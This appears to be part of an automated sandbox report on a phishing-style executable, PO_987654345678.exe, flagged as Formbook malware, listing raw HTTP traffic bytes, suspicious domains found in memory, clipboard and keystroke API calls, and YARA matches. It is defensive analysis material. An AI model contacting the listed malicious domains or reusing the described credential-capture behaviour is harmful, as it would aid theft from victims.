0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 08:45:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 03 Sep 2024 08:45:39 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | ETag: W/"66cd104a-b96" | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 03 Sep 2024 08:45:42 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 2966 | Connection: close | Vary: Accept-Encoding | ETag: "66cd104a-b96"
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: wts/1.7.0 | Date: Tue, 03 Sep 2024 08:46:02 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Cache-Control: private | Content-Encoding: gzip | Strict-Transport-Security: max-age=31536000
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: wts/1.7.0 | Date: Tue, 03 Sep 2024 08:46:04 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Cache-Control: private | Content-Encoding: gzip | Strict-Transport-Security: max-age=31536000
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: wts/1.7.0 | Date: Tue, 03 Sep 2024 08:46:07 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Cache-Control: private | Content-Encoding: gzip | Strict-Transport-Security: max-age=31536000
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: wts/1.7.0 | Date: Tue, 03 Sep 2024 08:46:09 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Cache-Control: private | Strict-Transport-Security: max-age=31536000
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.1 | Date: Tue, 03 Sep 2024 08:46:37 GMT | Content-Length: 0 | Connection: close | X-Rate-Limit-Limit: 5s | X-Rate-Limit-Remaining: 19 | X-Rate-Limit-Reset: 2024-09-03T08:46:42.8280947Z
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.1 | Date: Tue, 03 Sep 2024 08:46:40 GMT | Content-Length: 0 | Connection: close | X-Rate-Limit-Limit: 5s | X-Rate-Limit-Remaining: 18 | X-Rate-Limit-Reset: 2024-09-03T08:46:42.8280947Z
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.1 | Date: Tue, 03 Sep 2024 08:46:42 GMT | Content-Length: 0 | Connection: close | X-Rate-Limit-Limit: 5s | X-Rate-Limit-Remaining: 19 | X-Rate-Limit-Reset: 2024-09-03T08:46:47.9266839Z
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.1 | Date: Tue, 03 Sep 2024 08:46:45 GMT | Content-Length: 0 | Connection: close | X-Rate-Limit-Limit: 5s | X-Rate-Limit-Remaining: 19 | X-Rate-Limit-Reset: 2024-09-03T08:46:50.4771474Z
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 03 Sep 2024 08:46:51 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U4Gpe5dCC8l71X39Vn26SsjVr%2Fz7flPj06hnbricMWfiq73qS58YOygl66D20AiJ%2FfQIIVq9x2tLxcUvCN72dhfrAP2cKbKuvcyodOachdSQNC88dEpQRDPGVvsqWcoU6zNkr7jQrFW2Lwg%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8bd478c1da5b42b7-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 03 Sep 2024 08:46:54 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c91hzZfyLQVvalF5d%2FNsVYmFDqNSsdwOqAxeUECQc5IbUfhh%2Bhmw9whbhXxgLvHTd9Ry4j0B0UoDC%2F7njtMFfosqovQuJ4UTf9dDeuNTdMt2yqx0B9%2F7t1d3DE1gLxKOCVQ8X0Q4FfS9Cl0%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8bd478d18c634211-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 03 Sep 2024 08:46:56 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BTiToVapIr%2F1t2X2ecpH9c0h6KT95l0sLClWclHzwrcnWokq1JZh6aC%2F7hKTuuemiedquf1To6FfaDYQceFI5ENNFqAGy%2F2YUkjOBHdE8DT2E%2BK3QqVBHeL1HTSlghDhRFZ7Eovwwc78ZG4%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8bd478e1a9634299-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 03 Sep 2024 08:46:59 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZhdR9PY6ImYDVp3yxFsS%2F9eD96c5kcCAyZC71xPogWeCoVVIyRSEvZg1JKUmVNBIxfua7m6dR50d%2BFPvxP8cJNAJ49Rs%2FTzm4Lww6vNZp7%2FmyyBY62QhS8fQUkIndC%2BwV5vqId74oUY%2Bj%2B4%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8bd478f178e3c3eb-EWR | alt-svc: h3=":443"; ma=86400 | Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0
            Source: chkntfs.exe, 00000003.00000002.4119101815.0000000006052000.00000004.10000000.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000004202000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH
            Source: ftfqgrfncDSuar.exe, 00000007.00000002.4120389612.00000000057E2000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.begumnasreenbano.com
            Source: ftfqgrfncDSuar.exe, 00000007.00000002.4120389612.00000000057E2000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.begumnasreenbano.com/ibl4/
            Source: chkntfs.exe, 00000003.00000002.4119101815.0000000005554000.00000004.10000000.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000003704000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2144411310.0000000019FE4000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725353011.0046901200&other_args=eyJ1cmkiOiAiL
            Source: chkntfs.exe, 00000003.00000002.4119101815.000000000669A000.00000004.10000000.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.000000000484A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.dfbio.net:80/yzen/?Qd=O9V9WpJA2Id3CQ8eXizaOlP9WjrM4aluQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvu
            Source: firefox.exe, 00000008.00000002.2144411310.0000000019FE4000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www70.clientebradesco.online/
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4117707288.0000000002E62000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002E62000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002E62000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: chkntfs.exe, 00000003.00000003.2027794079.0000000007DB4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: chkntfs.exe, 00000003.00000002.4119101815.0000000005D2E000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4119101815.00000000056E6000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4120867078.0000000007AF0000.00000004.00000800.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000003896000.00000004.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000003EDE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F7EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, | 0_2_00F7EAFF
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F7ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, | 0_2_00F7ED6A
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F7EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, | 0_2_00F7EAFF
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F6AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, | 0_2_00F6AA57
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F99576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, | 0_2_00F99576

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: PO_987654345678.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PO_987654345678.exe, 00000000.00000000.1646117746.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_4680e68f-0
            Source: PO_987654345678.exe, 00000000.00000000.1646117746.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_17f4b972-1
            Source: PO_987654345678.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_7fcc9e25-2
            Source: PO_987654345678.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamT